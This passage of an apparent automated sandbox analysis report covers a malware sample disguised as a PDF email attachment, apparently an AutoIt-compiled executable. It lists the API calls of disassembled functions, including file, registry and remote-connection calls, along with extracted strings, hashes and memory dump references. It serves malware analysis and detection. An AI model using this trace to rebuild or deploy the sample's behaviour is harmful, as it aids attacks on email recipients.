                                                                                                          • Instruction Fuzzy Hash: FD414B72900209EACF08FBE0DD8ADEE7778AF55301F104065F905B60A2EA796F49CB61
                                                                                                          Function 007DBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,007D9207,?,?), ref: 007DBA56
                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA6D
                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA78
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA85
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 007DBA8E
                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBA9D
                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 007DBAA6
                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBAAD
                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007D9207,?,?,00000000,?), ref: 007DBABE
                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,007E2CAC,?), ref: 007DBAD7
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 007DBAE7
                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 007DBB0B
                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 007DBB36
                                                                                                          • DeleteObject.GDI32(00000000), ref: 007DBB5E
                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 007DBB74
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3840717409-0
                                                                                                          • Opcode ID: d7e03ecb3cc5b28d43f27480fd3e99a95dc5b227da19f981a5c9bc4d69035856
                                                                                                          • Instruction ID: ee46b1a1177844fb3924d540281141916381c43afc745517e2309b0be624a0d2
                                                                                                          • Opcode Fuzzy Hash: d7e03ecb3cc5b28d43f27480fd3e99a95dc5b227da19f981a5c9bc4d69035856
                                                                                                          • Instruction Fuzzy Hash: D1413975601208EFDB119F65DC88EAEBBB8FF89711F15806AF906D7260D7389E01CB64
                                                                                                          Function 007BD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 007BDA10
                                                                                                          • _wcscat.LIBCMT ref: 007BDA28
                                                                                                          • _wcscat.LIBCMT ref: 007BDA3A
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDA4F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDA63
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 007BDA7B
                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDA95
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDAA7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 34673085-438819550
                                                                                                          • Opcode ID: 9c0bd21ba8bb2272fd082eb11e2c236ee640f6e265738d4fb165643030997756
                                                                                                          • Instruction ID: c23ce08899984b9a3c0e579a2277b7cf48896bae1eee2b1483156f7c72d55f41
                                                                                                          • Opcode Fuzzy Hash: 9c0bd21ba8bb2272fd082eb11e2c236ee640f6e265738d4fb165643030997756
                                                                                                          • Instruction Fuzzy Hash: 39816EB15042459FCB34EF64C844AEAB7E9EF89350F18882AF889C7251E638ED45CB52
                                                                                                          Function 007DC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC1FC
                                                                                                          • GetFocus.USER32 ref: 007DC20C
                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 007DC217
                                                                                                          • _memset.LIBCMT ref: 007DC342
                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC36D
                                                                                                          • GetMenuItemCount.USER32(?), ref: 007DC38D
                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 007DC3A0
                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC3D4
                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC41C
                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC454
                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC489
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 1296962147-4108050209
                                                                                                          • Opcode ID: a7d491eae467bdad38076405775c1fdf294d3104b0acd0171a80bcee123a041c
                                                                                                          • Instruction ID: a8967790cd24ba47bf1ce4a0d359cde1aeda37febe7410656d1f6674584f5996
                                                                                                          • Opcode Fuzzy Hash: a7d491eae467bdad38076405775c1fdf294d3104b0acd0171a80bcee123a041c
                                                                                                          • Instruction Fuzzy Hash: 1F816B702093429FD712CF14C894AAABBF8FF88714F00892EF99597391D778D905CBA2
                                                                                                          Function 007C731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDC.USER32(00000000), ref: 007C738F
                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C739B
                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 007C73A7
                                                                                                          • SelectObject.GDI32(00000000,?), ref: 007C73B4
                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C7408
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7444
                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C7468
                                                                                                          • SelectObject.GDI32(00000006,?), ref: 007C7470
                                                                                                          • DeleteObject.GDI32(?), ref: 007C7479
                                                                                                          • DeleteDC.GDI32(00000006), ref: 007C7480
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 007C748B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                          • String ID: (
                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                          • Opcode ID: ac2edbb4180da5ea4c75440be5b534cafc23c7a1cfea093ebed92fb7d3efffe4
                                                                                                          • Instruction ID: 037da7544db92a7a6f22c8287954ed2b307e041597aaf2d629615f5dcafee379
                                                                                                          • Opcode Fuzzy Hash: ac2edbb4180da5ea4c75440be5b534cafc23c7a1cfea093ebed92fb7d3efffe4
                                                                                                          • Instruction Fuzzy Hash: BC513871904249EFCB14CFA8CC89EAEBBB9EF48310F14C42EF95A97210C735A940CB50
                                                                                                          Function 007D0E1A Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007CFDAD,?,?), ref: 007D0E31
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BuffCharUpper
                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$Pm
                                                                                                          • API String ID: 3964851224-1436186361
                                                                                                          • Opcode ID: f5308728057844d2a663890636d9df807e981cfc0e20ba07b927e3b0ba5507a8
                                                                                                          • Instruction ID: 94fb217c4413084fad1927cc7d040548c4b91bee09711a0eaf12b39baf6d3f0a
                                                                                                          • Opcode Fuzzy Hash: f5308728057844d2a663890636d9df807e981cfc0e20ba07b927e3b0ba5507a8
                                                                                                          • Instruction Fuzzy Hash: 3A41667150024ACBCF10EF50E86AAEE3364FF11340F658416FC995B292DB78A91ACBA0
                                                                                                          Function 00756A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00770957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756B0C,?,00008000), ref: 00770973
                                                                                                            • Part of subcall function 00754750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00754743,?,?,007537AE,?), ref: 00754770
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756BAD
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00756CFA
                                                                                                            • Part of subcall function 0075586D: _wcscpy.LIBCMT ref: 007558A5
                                                                                                            • Part of subcall function 0077363D: _iswctype.LIBCMT ref: 00773645
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                          • API String ID: 537147316-1018226102
                                                                                                          • Opcode ID: b2dd9f1c441d2dfca279bf6f23bd3af2210f855dc6f11de4541a670ec9fa9594
                                                                                                          • Instruction ID: 12671ac4cb814dd2ce79fffc3e1f4a2154f2492dd94ad4574d21c8e5519e97af
                                                                                                          • Opcode Fuzzy Hash: b2dd9f1c441d2dfca279bf6f23bd3af2210f855dc6f11de4541a670ec9fa9594
                                                                                                          • Instruction Fuzzy Hash: D202AB70208340DFCB24EF20C8959AFBBE5EF95314F50491DF89A972A1DB78E949CB52
                                                                                                          Function 007B2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007B2D50
                                                                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 007B2DDD
                                                                                                          • GetMenuItemCount.USER32(00815890), ref: 007B2E66
                                                                                                          • DeleteMenu.USER32(00815890,00000005,00000000,000000F5,?,?), ref: 007B2EF6
                                                                                                          • DeleteMenu.USER32(00815890,00000004,00000000), ref: 007B2EFE
                                                                                                          • DeleteMenu.USER32(00815890,00000006,00000000), ref: 007B2F06
                                                                                                          • DeleteMenu.USER32(00815890,00000003,00000000), ref: 007B2F0E
                                                                                                          • GetMenuItemCount.USER32(00815890), ref: 007B2F16
                                                                                                          • SetMenuItemInfoW.USER32(00815890,00000004,00000000,00000030), ref: 007B2F4C
                                                                                                          • GetCursorPos.USER32(?), ref: 007B2F56
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 007B2F5F
                                                                                                          • TrackPopupMenuEx.USER32(00815890,00000000,?,00000000,00000000,00000000), ref: 007B2F72
                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 007B2F7E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 3993528054-0
                                                                                                          • Opcode ID: 08d14f988a71bcc55cdc1cee67b262a847fa413bcb7ff57163768ecce94e1fbd
                                                                                                          • Instruction ID: e502760cce1e5a37ecaa4e84144baf8990b2a83f9eb138334e878a78547aea3c
                                                                                                          • Opcode Fuzzy Hash: 08d14f988a71bcc55cdc1cee67b262a847fa413bcb7ff57163768ecce94e1fbd
                                                                                                          • Instruction Fuzzy Hash: DB710870602205BFEB218F55DC49FEABF64FF04364F14421AF625AA1E2C7799C21D794
                                                                                                          Function 007C88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 007C88D7
                                                                                                          • CoInitialize.OLE32(00000000), ref: 007C8904
                                                                                                          • CoUninitialize.OLE32 ref: 007C890E
                                                                                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8A0E
                                                                                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8B3B
                                                                                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8B6F
                                                                                                          • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8B92
                                                                                                          • SetErrorMode.KERNEL32(00000000), ref: 007C8BA5
                                                                                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8C25
                                                                                                          • VariantClear.OLEAUT32(?), ref: 007C8C35
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                          • String ID: ,,~
                                                                                                          • API String ID: 2395222682-1083855107
                                                                                                          • Opcode ID: 529cef7bf7191b2d4e8bbee020a0ab03726badb3e953ece39431c3f638c69b53
                                                                                                          • Instruction ID: 9bd1c3179675e0c810f0b5e7b183e1140b8aae052fdfb87ca13e85d3e70ffe33
                                                                                                          • Opcode Fuzzy Hash: 529cef7bf7191b2d4e8bbee020a0ab03726badb3e953ece39431c3f638c69b53
                                                                                                          • Instruction Fuzzy Hash: 25C104B1608305EFC740DF64C884E6AB7E9BF89348F00495DF98A9B261DB75ED05CB62
                                                                                                          Function 007A77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                          • _memset.LIBCMT ref: 007A786B
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 007A78A0
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 007A78BC
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 007A78D8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 007A7902
                                                                                                          • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 007A792A
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007A7935
                                                                                                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 007A793A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 1411258926-22481851
                                                                                                          • Opcode ID: f8f13e406d6ccf1706f30f6fa730838f6a07cdd409d866b83d40f08167bdb2c5
                                                                                                          • Instruction ID: f131421df3ce6f81f23e92cf7e700bf864071676ae4681b1baf0552d3655d80d
                                                                                                          • Opcode Fuzzy Hash: f8f13e406d6ccf1706f30f6fa730838f6a07cdd409d866b83d40f08167bdb2c5
                                                                                                          • Instruction Fuzzy Hash: CD411A72C14229EBCF15EB94EC49DEEB778FF04351F40452AE815A3161DB786D08CBA0
                                                                                                          Function 007AF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0078E2A0,00000010,?,Bad directive syntax error,007DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 007AF7C2
                                                                                                          • LoadStringW.USER32(00000000,?,0078E2A0,00000010), ref: 007AF7C9
                                                                                                            • Part of subcall function 00757DE1: _memmove.LIBCMT ref: 00757E22
                                                                                                          • _wprintf.LIBCMT ref: 007AF7FC
                                                                                                          • __swprintf.LIBCMT ref: 007AF81E
                                                                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007AF88D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                          • API String ID: 1506413516-4153970271
                                                                                                          • Opcode ID: b356304d06818ea462d544406de458bc15dc8da4c870f80db0b4f51a58442efc
                                                                                                          • Instruction ID: 5cc9c65784e160f2b7fb9ba79f643fa6be37c8611a21139ec614707ea94373b5
                                                                                                          • Opcode Fuzzy Hash: b356304d06818ea462d544406de458bc15dc8da4c870f80db0b4f51a58442efc
                                                                                                          • Instruction Fuzzy Hash: A421913190021DEBCF15EF90CC0AEED7738FF18301F044866F915661A2EA79A658DB50
                                                                                                          Function 007B52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00757BCC: _memmove.LIBCMT ref: 00757C06
                                                                                                            • Part of subcall function 00757924: _memmove.LIBCMT ref: 007579AD
                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B5330
                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B5346
                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B5357
                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B5369
                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B537A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: SendString$_memmove
                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                          • API String ID: 2279737902-1007645807
                                                                                                          • Opcode ID: 64febce3c70100c9df30334ca3bfc09e523d8b941b3f8c56e3008c3937733681
                                                                                                          • Instruction ID: 0ee5dec326bfb8a66dc5b511fbd98d129cb67780abbe27e3c1937b252480b8fd
                                                                                                          • Opcode Fuzzy Hash: 64febce3c70100c9df30334ca3bfc09e523d8b941b3f8c56e3008c3937733681
                                                                                                          • Instruction Fuzzy Hash: E411B261A50129B9D764B661DC4EEFF7BBCFB92B44F000429B821E21D1DEF81D48C5B0
                                                                                                          Function 007B46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
